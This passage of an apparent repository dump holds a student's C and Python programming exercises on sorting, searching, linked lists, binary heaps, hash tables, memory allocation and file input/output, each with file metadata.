*sep;\n\n\tsep = \"\";\n\tfor (i = begin; i < end; i++)\n\t{\n\t\tprintf(\"%s%d\", sep, array[i]);\n\t\tsep = \", \";\n\t}\n\tprintf(\"\\n\");\n}\n/**\n * sortup - sorts a subarray in increasing order\n * @array: array to sort\n * @begin: begin position of the array\n * @size: last position + 1 of the array\n */\nvoid sortup(int *array, int begin, int size)\n{\n\tint j, cont = begin, pos;\n\tint aux, flag = 0, value;\n\n\twhile (cont < size)\n\t{\n\t\tpos = cont;\n\t\tvalue = array[cont];\n\t\tfor (j = cont; j < size; j++)\n\t\t{\n\t\t\tif (value > array[j])\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t\tvalue = array[j];\n\t\t\t\tpos = j;\n\t\t\t}\n\t\t}\n\t\tif (flag == 1)\n\t\t{\n\t\t\taux = array[cont];\n\t\t\tarray[cont] = value;\n\t\t\tarray[pos] = aux;\n\t\t}\n\t\tcont++;\n\t\tflag = 0;\n\t}\n\tprintarr(array, begin, size);\n}\n/**\n * sortdown - sorts a subarray in decreasing order\n * @array: array to sort\n * @begin: initial position\n * @size: last position + 1 of the array\n */\nvoid sortdown(int *array, int begin, int size)\n{\n\tint j, cont = begin, pos;\n\tint aux, flag = 0, value;\n\n\twhile (cont < size)\n\t{\n\t\tpos = cont;\n\t\tvalue = array[cont];\n\t\tfor (j = cont; j < size; j++)\n\t\t{\n\t\t\tif (value < array[j])\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t\tvalue = array[j];\n\t\t\t\tpos = j;\n\t\t\t}\n\t\t}\n\t\tif (flag == 1)\n\t\t{\n\t\t\taux = array[cont];\n\t\t\tarray[cont] = value;\n\t\t\tarray[pos] = aux;\n\t\t}\n\t\tcont++;\n\t\tflag = 0;\n\t}\n\tprintarr(array, begin, size);\n\n}\n/**\n * sorting - recursive partition of the array\n * @array: array\n * @begin: initial position\n * @end: last position + 1 of the array\n * @bool: 0 or 1 to know if it is UP or DOWN\n * @size: size of the original array\n */\nvoid sorting(int *array, int begin, int end, int bool, int size)\n{\n\tchar *dir;\n\n\tif (end - begin < 2)\n\t\treturn;\n\n\tif (bool == 0)\n\t\tdir = \"UP\";\n\telse\n\t\tdir = \"DOWN\";\n\tprintf(\"Merging [%d/%d] (%s):\\n\", (end - begin), size, dir);\n\tprintarr(array, begin, end);\n\n\tif (end - begin == 2)\n\t\treturn;\n\n\tsorting(array, begin, (begin + end) / 2, 0, size);\n\tprintf(\"Result [%d/%d] (UP):\\n\", (((end + begin) / 2) - begin), size);\n\tsortup(array, begin, (begin + end) / 2);\n\n\tsorting(array, (begin + end) / 2, end, 1, size);\n\tprintf(\"Result [%d/%d] (DOWN):\\n\", (((end + begin) / 2) - begin), size);\n\tsortdown(array, (begin + end) / 2, end);\n\n}\n/**\n * bitonic_sort - sorts an array using the bitonic sort scheme\n * @array: array to sort\n * @size: size of array\n */\nvoid bitonic_sort(int *array, size_t size)\n{\n\tif (!array || size <= 1)\n\t{\n\t\treturn;\n\t}\n\tsorting(array, 0, size, 0, (int)size);\n\tprintf(\"Result [%ld/%ld] (UP):\\n\", size, size);\n\tsortup(array, 0, (int)size);\n\n}\n" }, { "alpha_fraction": 0.30779942870140076, "alphanum_fraction": 0.32729804515838623, "avg_line_length": 31.636363983154297, "blob_id": "c1e075b8aa524458a100e56562907174320b439e", "content_id": "0adaac88c786236bb29cfcc01295d53e95ba1d94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/0x1C-makefiles/5-island_perimeter.py", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\"\"\"module to find island perimeter\"\"\"\n\n\ndef island_perimeter(grid):\n    \"\"\"returns the perimeter of the island described in grid\"\"\"\n    count = 0\n    for column in range(len(grid)):\n        for row in 
range(len(grid[column])):\n            if grid[column][row] == 1:\n                # verify up\n                if column - 1 < 0:\n                    count += 1\n                else:\n                    try:\n                        if grid[column - 1][row] == 0:\n                            count += 1\n                    except IndexError:\n                        pass\n                # verify down\n                if column + 1 > len(grid) - 1:\n                    count += 1\n                else:\n                    try:\n                        if grid[column + 1][row] == 0:\n                            count += 1\n                    except IndexError:\n                        pass\n                # verify right\n                if row + 1 > len(grid[column]) - 1:\n                    count += 1\n                else:\n                    try:\n                        if grid[column][row + 1] == 0:\n                            count += 1\n                    except IndexError:\n                        pass\n                # verify left\n                try:\n                    if row - 1 < 0 or grid[column][row - 1] == 0:\n                        count += 1\n                except IndexError:\n                    pass\n    return count\n" }, { "alpha_fraction": 0.6407484412193298, "alphanum_fraction": 0.6469854712486267, "avg_line_length": 24.540817260742188, "blob_id": "fed88a143620fcb0e1f40846175b45d55170d2b3", "content_id": "f596c8f74fde0e5eb4b9835ba85ed3b1d35752d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2405, "license_type": "no_license", "max_line_length": 79, "num_lines": 98, "path": "/0x1E-search_algorithms/103-exponential.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"search_algos.h\"\n\n/**\n * _min - function that finds the minimum between two numbers\n * @a: number\n * @b: number\n * Return: minimum value\n */\nsize_t _min(size_t a, size_t b)\n{\n\tsize_t min;\n\n\tif (a < b)\n\t\tmin = a;\n\telse\n\t\tmin = b;\n\treturn (min);\n}\n/**\n * print_arr_bin - function that prints an array\n * @array: a pointer to the first element of the complete array\n * @left: first index of subarray\n * @right: last index of subarray\n */\nvoid print_arr_bin(int *array, size_t left, size_t right)\n{\n\tprintf(\"Searching in array: \");\n\tfor (; left < right; left++)\n\t{\n\t\tprintf(\"%d, \", array[left]);\n\t}\n\tprintf(\"%d\\n\", array[left]);\n}\n\n/**\n * binary_search_exp - function that searches for a value in a sorted array of\n * integers using the Binary search algorithm\n * @array: a pointer to the first element of the array to search in\n * @size: the number of elements in array\n * @value: is the value to search for\n * @left: first position to search in array\n * Return: return the first index where value is located. If value is not\n * present in array or if array is NULL, your function must return -1\n */\n\nint binary_search_exp(int *array, size_t left, size_t size, int value)\n{\n\tsize_t right, middle;\n\n\tright = size - 1;\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\twhile (left < size)\n\t{\n\t\tprint_arr_bin(array, left, right);\n\t\tmiddle = (left + right) / 2;\n\t\tif (array[middle] < value)\n\t\t{\n\t\t\tleft = middle + 1;\n\t\t}\n\t\telse if (array[middle] > value)\n\t\t{\n\t\t\tright = middle - 1;\n\t\t}\n\t\telse\n\t\t\treturn ((int) middle);\n\t}\n\treturn (-1);\n}\n\n/**\n * exponential_search - function that searches for a value in a sorted array of\n * integers using the Exponential search algorithm\n * @array: a pointer to the first element of the array to search in\n * @size: the number of elements in array\n * @value: is the value to search for\n * Return: return the first index where value is located. If value is not\n * present in array or if array is NULL, your function must return -1\n */\nint exponential_search(int *array, size_t size, int value)\n{\n\tsize_t bound = 1;\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\twhile (bound < size && array[bound] < value)\n\t{\n\t\tprintf(\"Value checked array[%d] = [%d]\\n\", (int) bound, array[bound]);\n\t\tbound *= 
2;\n\t}\n\n\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) (bound / 2),\n\t       (int) _min(bound, size - 1));\n\treturn (binary_search_exp(array, (bound / 2), _min(bound + 1, size), value));\n}\n" }, { "alpha_fraction": 0.3341902196407318, "alphanum_fraction": 0.37660667300224304, "avg_line_length": 15.553191184997559, "blob_id": "41ede67babd6100a790af0cf3494ec695be7cab7", "content_id": "8cf375292939166beaf6b822e4afb608296f08b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 778, "license_type": "no_license", "max_line_length": 64, "num_lines": 47, "path": "/0x02-functions_nested_loops/100-times_table.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_times_table - prints the n times table, starting with 0\n * @n: input variable.\n */\n\nvoid print_times_table(int n)\n{\n\tint r, m, d, fd, td;\n\n\tif (n <= 15)\n\t{\n\t\tfor (m = 0; m <= n; m++)\n\t\t{\n\t\t\tfor (d = 0; d <= n; d++)\n\t\t\t{ r = m * d;\n\t\t\t\tfd = (r / 10) % 10;\n\t\t\t\tif (r < 10)\n\t\t\t\t{\n\t\t\t\t\tif (!(d == 0))\n\t\t\t\t\t{ _putchar(' ');\n\t\t\t\t\t\t_putchar(' ');\n\t\t\t\t\t}\n\t\t\t\t\t_putchar('0' + r);\n\t\t\t\t}\n\t\t\t\telse if (r >= 10 && r < 100)\n\t\t\t\t{ r = r % 10;\n\t\t\t\t\t_putchar(' ');\n\t\t\t\t\t_putchar('0' + fd);\n\t\t\t\t\t_putchar('0' + r);\n\t\t\t\t}\n\t\t\t\telse if (r >= 100)\n\t\t\t\t{ td = r / 100;\n\t\t\t\t\tr = r % 10;\n\t\t\t\t\t_putchar('0' + td);\n\t\t\t\t\t_putchar('0' + fd);\n\t\t\t\t\t_putchar('0' + r);\n\t\t\t\t}\n\t\t\t\tif (!(d == n))\n\t\t\t\t{ _putchar(',');\n\t\t\t\t\t_putchar(' ');\n\t\t\t\t}\n\t\t\t}\n\t\t\t_putchar('\\n');\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5374449491500854, "alphanum_fraction": 0.566079318523407, "avg_line_length": 19.177778244018555, "blob_id": "d9e6a00204b3fd3c550d45acab0d4a1ba486d459", "content_id": "4b904897bc39c0080a1ecf96a4e2d725363e3688", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 908, "license_type": "no_license", "max_line_length": 70, "num_lines": 45, "path": "/0x0C-more_malloc_free/101-mul.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n#include <stdlib.h>\n#include <ctype.h>\n#include <string.h>\n/**\n * main - program that prints the multiplication result of two numbers.\n * @argc: argument count.\n * @argv: argument vector.\n * Return: 0 on success; exits with status 98 on error.\n */\nint main(int argc, char *argv[])\n{\n\tint mul, i, array_i, len1, len2;\n\tchar *result = NULL;\n\n\tif (argc != 3)\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(98);\n\t}\n\telse\n\t{\n\t\tlen1 = strlen(argv[1]);\n\t\tlen2 = strlen(argv[2]);\n\t\tresult = malloc(sizeof(char) * (len1 + len2 + 1));\n\t\tif (result == NULL)\n\t\t\texit(98);\n\t\tfor (i = 1; i < argc; i++)\n\t\t{\n\t\t\tfor (array_i = 0; argv[i][array_i] != '\\0'; array_i++)\n\t\t\t{\n\t\t\t\tif (!isdigit(argv[i][array_i]))\n\t\t\t\t{\n\t\t\t\t\tprintf(\"Error\\n\");\n\t\t\t\t\texit(98);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tmul = atoi(argv[1]) * atoi(argv[2]);\n\t\tprintf(\"%d\\n\", mul);\n\t}\n\tfree(result);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.5967302322387695, "alphanum_fraction": 0.6046321392059326, "avg_line_length": 19.502792358398438, "blob_id": "47e17f7fb1cff9d8f5bd8b14f4c13e33ec05a094", "content_id": 
"51fb1fa824d0121529d15d47c90bcb423ee3ef89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3670, "license_type": "no_license", "max_line_length": 77, "num_lines": 179, "path": "/0x1D-binary_trees/131-heap_insert_copy.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"binary_trees.h\"\n\n/**\n * swap_right - function that swap if parent is bigger, right case\n * @node: node to be checked and swaped\n * @parent: node->parent\n */\nvoid swap_right(heap_t *node, heap_t *parent)\n{\n\theap_t *aux, *aux2;\n\n\taux = parent->left;\n\taux2 = parent->parent;\n\n\tparent->right = node->right;\n\tif (node->right)\n\t\tnode->right->parent = parent;\n\tparent->left = node->left;\n\tif (node->left)\n\t\tnode->left->parent = parent;\n\n\tnode->right = parent;\n\tnode->left = aux;\n\tif (aux)\n\t\taux->parent = node;\n\tparent->parent = node;\n\tnode->parent = aux2;\n\tif (aux2 && parent == aux2->left)\n\t\taux2->left = node;\n\telse if (aux2 && parent == aux2->right)\n\t\taux2->right = node;\n}\n\n/**\n * swap_left - function that swap if parent is bigger, left case\n * @node: node to be checked and swaped\n * @parent: node->parent\n */\nvoid swap_left(heap_t *node, heap_t *parent)\n{\n\theap_t *aux, *aux2;\n\n\taux = parent->right;\n\taux2 = parent->parent;\n\n\tparent->right = node->right;\n\tif (node->right)\n\t\tnode->right->parent = parent;\n\tparent->left = node->left;\n\tif (node->left)\n\t\tnode->left->parent = parent;\n\n\tnode->left = parent;\n\tnode->right = aux;\n\tif (aux)\n\t\taux->parent = node;\n\tparent->parent = node;\n\tnode->parent = aux2;\n\tif (aux2 && parent == aux2->left)\n\t\taux2->left = node;\n\telse if (aux2 && parent == aux2->right)\n\t\taux2->right = node;\n}\n/**\n * height - measures the height of a tree\n *\n * @tree: tree root\n * Return: height\n */\nint height(const binary_tree_t *tree)\n{\n\tint left = 0;\n\tint right = 0;\n\n\tif (tree == NULL)\n\t\treturn (-1);\n\n\tleft = height(tree->left);\n\tright = height(tree->right);\n\n\tif (left > right)\n\t\treturn (left + 1);\n\n\treturn (right + 1);\n}\n\n/**\n * binary_tree_is_perfect - checks if a binary tree is perfect\n *\n * @tree: tree root\n * Return: 1 if tree is perfect, 0 otherwise\n */\nint binary_tree_is_perfect(const binary_tree_t *tree)\n{\n\tif (tree && height(tree->left) == height(tree->right))\n\t{\n\t\tif (height(tree->left) == -1)\n\t\t\treturn (1);\n\n\t\tif ((tree->left && !((tree->left)->left) && !((tree->left)->right))\n\t\t && (tree->right && !((tree->right)->left) && !((tree->right)->right)))\n\t\t\treturn (1);\n\n\t\tif (tree && tree->left && tree->right)\n\t\t\treturn (binary_tree_is_perfect(tree->left) &&\n\t\t\t\tbinary_tree_is_perfect(tree->right));\n\t}\n\n\treturn (0);\n}\n\n/**\n * swap - function that swap if parent is bigger\n * @arg_node: node to be checked and swaped\n */\nvoid swap(const heap_t *node)\n{\n\theap_t *parent;\n\n\tparent = node->parent;\n\n\twhile (node->parent && node->n > node->parent->n)\n\t{\n\t\tparent = node->parent;\n\t\tif (node == parent->right)\n\t\t{\n\t\t\tswap_right((heap_t *)node, parent);\n\t\t}\n\t\telse if (node == parent->left)\n\t\t{\n\t\t\tswap_left((heap_t *)node, parent);\n\t\t}\n\t}\n}\n\n/**\n * heap_insert - function that inserts a value in Max Binary Heap\n * @value: value to be inserted\n * @root: tree root\n * Return: pointer to the created node, or NULL on failure.\n */\nheap_t *heap_insert(heap_t **root, int 
value)\n{\n\theap_t *new_node;\n\theap_t **root_right, **root_left;\n\n\tif (*root == NULL)\n\t{\n\t\t*root = binary_tree_node(NULL, value);\n\t\treturn (*root);\n\t}\n\troot_right = &((*root)->right);\n\troot_left = &((*root)->left);\n\n\tif (binary_tree_is_perfect(*root) || !binary_tree_is_perfect((*root)->left))\n\t{\n\t\tif ((*root)->left)\n\t\t\tnew_node = heap_insert(root_left, value);\n\t\telse\n\t\t{\n\t\t\tnew_node = (*root)->left = binary_tree_node(*root, value);\n\t\t\tswap(new_node);\n\t\t}\n\t}\n\telse\n\t{\n\t\tif ((*root)->right)\n\t\t\tnew_node = heap_insert(root_right, value);\n\t\telse\n\t\t{\n\t\t\tnew_node = (*root)->right = binary_tree_node(*root, value);\n\t\t\tswap(new_node);\n\t\t}\n\t}\n\n\tif (new_node->parent == NULL && (*root)->parent != NULL &&\n\t    !((*root)->parent->parent))\n\t\t*root = new_node;\n\treturn (new_node);\n}\n" }, { "alpha_fraction": 0.5896487832069397, "alphanum_fraction": 0.5914972424507141, "avg_line_length": 15.90625, "blob_id": "fadb52ffd5816465d918a17312b48f49a9a9601a", "content_id": "cf4c6b052843b2beb8961920b74dfa9894aaed24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 541, "license_type": "no_license", "max_line_length": 58, "num_lines": 32, "path": "/0x1A-hash_tables/6-hash_table_delete.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"hash_tables.h\"\n\n/**\n * hash_table_delete - function that deletes a hash table.\n * @ht: hash table that will be deleted.\n */\n\nvoid hash_table_delete(hash_table_t *ht)\n{\n\thash_node_t *cursor;\n\thash_node_t *temp;\n\tunsigned long int i;\n\n\tif (ht == NULL)\n\t\treturn;\n\n\tfor (i = 0; i < ht->size; i++)\n\t{\n\t\tif (ht->array[i] == NULL)\n\t\t\tcontinue;\n\t\tfor (cursor = ht->array[i]; cursor != NULL;)\n\t\t{\n\t\t\ttemp = cursor->next;\n\t\t\tfree(cursor->key);\n\t\t\tfree(cursor->value);\n\t\t\tfree(cursor);\n\t\t\tcursor = temp;\n\t\t}\n\t}\n\tfree(ht->array);\n\tfree(ht);\n}\n" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 16, "blob_id": "efe803eff51b1df2dc06f3eb3e51cdb32adf49e8", "content_id": "5b01708a38d15c8bcfc5e278a67620f12c695557", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17, "license_type": "no_license", "max_line_length": 16, "num_lines": 1, "path": "/0x1D-binary_trees/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### Binary trees\n" }, { "alpha_fraction": 0.5657015442848206, "alphanum_fraction": 0.570155918598175, "avg_line_length": 19.409090042114258, "blob_id": "dcf43a0257486f6b60200d27b1b6e9753dfc44cd", "content_id": "12803f3be9aa590a3c82d6634f654e65694396c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 449, "license_type": "no_license", "max_line_length": 76, "num_lines": 22, "path": "/0x07-pointers_arrays_strings/5-strstr.c", "repo_name": 
p_i++)\n\t\t\t;\n\t\tif (*p_ss == '\\0')\n\t\t\treturn (haystack);\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.5945945978164673, "alphanum_fraction": 0.6047297120094299, "avg_line_length": 16.41176414489746, "blob_id": "1a3164fa5528a1e8163fb6597ec8de4f29a57593", "content_id": "40d51396e334a945d657b388a842bb93433729bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 296, "license_type": "no_license", "max_line_length": 61, "num_lines": 17, "path": "/0x0B-malloc_free/4-free_grid.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * free_grid - frees a 2 dimensional grid previously created.\n * @grid: input matrix.\n * @height: height of the matrix.\n */\nvoid free_grid(int **grid, int height)\n{\n\tint k;\n\n\tfor (k = (height - 1); k >= 0; k--)\n\t{\n\t\tfree(grid[k]);\n\t}\n\tfree(grid);\n}\n" }, { "alpha_fraction": 0.6142321825027466, "alphanum_fraction": 0.6217228174209595, "avg_line_length": 20.360000610351562, "blob_id": "ed87d5f6645d4e18d46105d42afa595402c6b041", "content_id": "f81c9a0d3b6c5a50dd4ec52202b97a1ce3c9b3b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 534, "license_type": "no_license", "max_line_length": 73, "num_lines": 25, "path": "/0x0C-more_malloc_free/2-calloc.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * _calloc - allocates memory for an array of n elements of certain size.\n * @nmemb: number of elements to be allocated.\n * @size: size of elements.\n * Return: Pointer to allocated memory.\n */\nvoid *_calloc(unsigned int nmemb, unsigned int size)\n{\n\tchar *mem_as = NULL;\n\tunsigned int i;\n\n\tif (nmemb == 0 || size == 0)\n\t\treturn (NULL);\n\n\tmem_as = malloc(nmemb * size);\n\tif (mem_as == NULL)\n\t\treturn (NULL);\n\tfor (i = 0; i < (nmemb * size); i++)\n\t{\n\t\tmem_as[i] = 0;\n\t}\n\treturn (mem_as);\n}\n" }, { "alpha_fraction": 0.6390449404716492, "alphanum_fraction": 0.648876428604126, "avg_line_length": 19.941177368164062, "blob_id": "a209aa9b5f7b3415d4381a5711fb3b3453f7d8c8", "content_id": "c9e83e842f1cbc8dddb74cbb5a6be856945a8112", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 712, "license_type": "no_license", "max_line_length": 79, "num_lines": 34, "path": "/0x15-file_io/0-read_textfile.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * read_textfile - reads a text file and prints it to the POSIX stdout.\n * @filename: filename string.\n * @letters: number of letters it should read and print.\n * Return: he actual number of letters it could read and print or 0 if the file\n * can't be opened.\n */\n\nssize_t read_textfile(const char *filename, size_t letters)\n{\n\tint fd;\n\tint letter_co;\n\tchar *buf;\n\n\tif (filename == NULL)\n\t\treturn (0);\n\n\tfd = open(filename, O_RDONLY);\n\tif (fd == -1)\n\t\treturn (0);\n\tbuf = malloc(sizeof(char) * letters);\n\tif (buf == NULL)\n\t\treturn (0);\n\n\tletter_co = write(STDOUT_FILENO, buf, read(fd, buf, letters));\n\tif (letter_co == -1)\n\t\treturn (0);\n\n\tclose(fd);\n\tfree(buf);\n\treturn (letter_co);\n}\n" }, { "alpha_fraction": 0.6036745309829712, "alphanum_fraction": 0.6089239120483398, "avg_line_length": 14.875, 
"blob_id": "dcd7a7d599383c8b0a7c04b52c22ae97163e60ce", "content_id": "0974a0acf6c6fa6e38d0f5b34471fae398c7a0ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 381, "license_type": "no_license", "max_line_length": 68, "num_lines": 24, "path": "/0x13-more_singly_linked_lists/5-free_listint2.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * free_listint2 - frees a listint_t list and sets the head to NULL.\n * @head: pointer to first node.\n */\nvoid free_listint2(listint_t **head)\n{\n\tlistint_t *temp;\n\tlistint_t *cursor;\n\n\tif (head == NULL)\n\t\treturn;\n\n\tif (*head == NULL)\n\t\treturn;\n\ttemp = *head;\n\twhile (temp != NULL)\n\t{\n\t\tcursor = temp;\n\t\ttemp = temp->next;\n\t\tfree(cursor);\n\t}\n\t*head = NULL;\n}\n" }, { "alpha_fraction": 0.8399999737739563, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 125, "blob_id": "b8d3638733b95006ba4d954535c16bb6e8d82128", "content_id": "3d071df4b713e53a45db8d8ab1b060d52912615c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "no_license", "max_line_length": 125, "num_lines": 1, "path": "/0x02-functions_nested_loops/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This is a repository with different C programs created for the purpose of studing prototype functions, loops and nested loops" }, { "alpha_fraction": 0.5475504398345947, "alphanum_fraction": 0.579250693321228, "avg_line_length": 17.263158798217773, "blob_id": "55602962bd0099d855c733b2b1745f5e60e81468", "content_id": "ba14362a951759fa71adc904a220c0ed6c51f274", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 694, "license_type": "no_license", "max_line_length": 77, "num_lines": 38, "path": "/0x13-more_singly_linked_lists/103-find_loop.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n\n/**\n * find_listint_loop - finds the loop in a linked list.\n * @head: pointer to first node.\n * Return: the node address where the loop starts or NULL if there is no loop\n */\nlistint_t *find_listint_loop(listint_t *head)\n{\n\tlistint_t *ptr1 = NULL;\n\tlistint_t *ptr2 = NULL;\n\n\tif (head == NULL)\n\t\treturn (NULL);\n\tptr1 = head;\n\tptr2 = head;\n\n\twhile (ptr1 && ptr2 && ptr2->next)\n\t{\n\t\tptr1 = ptr1->next;\n\t\tptr2 = ptr2->next->next;\n\n\t\tif (ptr1 == ptr2)\n\t\t{\n\t\t\twhile (1)\n\t\t\t{\n\t\t\t\tptr2 = ptr1;\n\t\t\t\twhile (ptr2->next != ptr1 && ptr2->next != head)\n\t\t\t\t\tptr2 = ptr2->next;\n\t\t\t\tif (ptr2->next == head)\n\t\t\t\t\tbreak;\n\t\t\t\thead = head->next;\n\t\t\t}\n\t\t\treturn (head);\n\t\t}\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.5775193572044373, "alphanum_fraction": 0.5949612259864807, "avg_line_length": 19.639999389648438, "blob_id": "bf050303e70d14f816464ffdfd5eb98597740a9d", "content_id": "d07e67602411fff314b9d364805efe9bcee12fb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 516, "license_type": "no_license", "max_line_length": 72, "num_lines": 25, "path": "/0x08-recursion/6-is_prime_number.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * calc_prime - returns the 
recursively checks whether a given number is prime.\n * @n: input value.\n * @y: current candidate divisor, starting at 2.\n * Return: 1 if n is prime, otherwise 0.\n */\nint calc_prime(int n, int y)\n{\n\tif (n < 2)\n\t\treturn (0);\n\tif ((y * y) > n)\n\t\treturn (1);\n\tif (n % y == 0)\n\t\treturn (0);\n\treturn (calc_prime(n, (y + 1)));\n}\n\n/**\n * is_prime_number - checks whether a given number is prime.\n * @n: input value.\n * Return: 1 if the input integer is a prime number, otherwise return 0.\n */\nint is_prime_number(int n)\n{\n\treturn (calc_prime(n, 2));\n}\n" }, { "alpha_fraction": 0.3108384311199188, "alphanum_fraction": 0.3353783190250397, "avg_line_length": 12.216216087341309, "blob_id": "5189c82aa908e8f75e625cb72258b5d7a09da03c", "content_id": "1853f6fed3d36a5da07b95e753aa196594cbd639", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 489, "license_type": "no_license", "max_line_length": 41, "num_lines": 37, "path": "/0x02-functions_nested_loops/8-24_hours.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * jack_bauer - prints the 24 hour clock.\n *\n *\n */\n\nvoid jack_bauer(void)\n{\n\tint x, y, z, w;\n\n\tfor (x = '0'; x <= '2'; x++)\n\t{\n\t\tfor (y = '0'; y <= '9'; y++)\n\t\t{\n\t\t\tfor (z = '0'; z <= '5'; z++)\n\t\t\t{\n\t\t\t\tfor (w = '0'; w <= '9'; w++)\n\t\t\t\t{\n\t\t\t\t\tif (!(x == '2' && y > '3'))\n\t\t\t\t\t{\n\t\t\t\t\t\t_putchar(x);\n\t\t\t\t\t\t_putchar(y);\n\t\t\t\t\t\t_putchar(':');\n\t\t\t\t\t\t_putchar(z);\n\t\t\t\t\t\t_putchar(w);\n\t\t\t\t\t\t_putchar('\\n');\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5653979182243347, "alphanum_fraction": 0.5771626234054565, "avg_line_length": 19.35211181640625, "blob_id": "e40d0aa38d791c17f9721897b74e34e46817021f", "content_id": "84aec1bbf4863ae53966621beb320eb699c59e15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1445, "license_type": "no_license", "max_line_length": 74, "num_lines": 71, "path": "/0x1B-sorting_algorithms/102-counting_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * _calloc - allocates memory for an array of n elements of certain size.\n * @nmemb: number of elements to be allocated.\n * @size: size of elements.\n * Return: Pointer to allocated memory.\n */\nvoid *_calloc(unsigned int nmemb, unsigned int size)\n{\n\tchar *mem_as = NULL;\n\tunsigned int i;\n\n\tif (nmemb == 0 || size == 0)\n\t\treturn (NULL);\n\n\tmem_as = malloc(nmemb * size);\n\tif (mem_as == NULL)\n\t\treturn (NULL);\n\tfor (i = 0; i < (nmemb * size); i++)\n\t{\n\t\tmem_as[i] = 0;\n\t}\n\treturn (mem_as);\n}\n\n/**\n * counting_sort - sorts an array of integers in ascending order using the\n * Counting sort algorithm\n * @array: array of integers\n * @size: size of array\n */\nvoid counting_sort(int *array, size_t size)\n{\n\tint large = 0, j, idx, num;\n\tint *index_arr, *aux_arr;\n\tsize_t i;\n\n\tif (!array || size < 2)\n\t\treturn;\n\tfor (i = 0; i < size; i++)\n\t\tif (large < array[i])\n\t\t\tlarge = array[i];\n\tindex_arr = _calloc(large + 1, sizeof(int));\n\tif (index_arr == NULL)\n\t\treturn;\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tidx = array[i];\n\t\tindex_arr[idx] += 1;\n\t}\n\tfor (j = 1; j <= large; j++)\n\t\tindex_arr[j] += index_arr[j - 1];\n\tprint_array(index_arr, large + 1);\n\taux_arr = malloc(size * sizeof(int));\n\tif (aux_arr == 
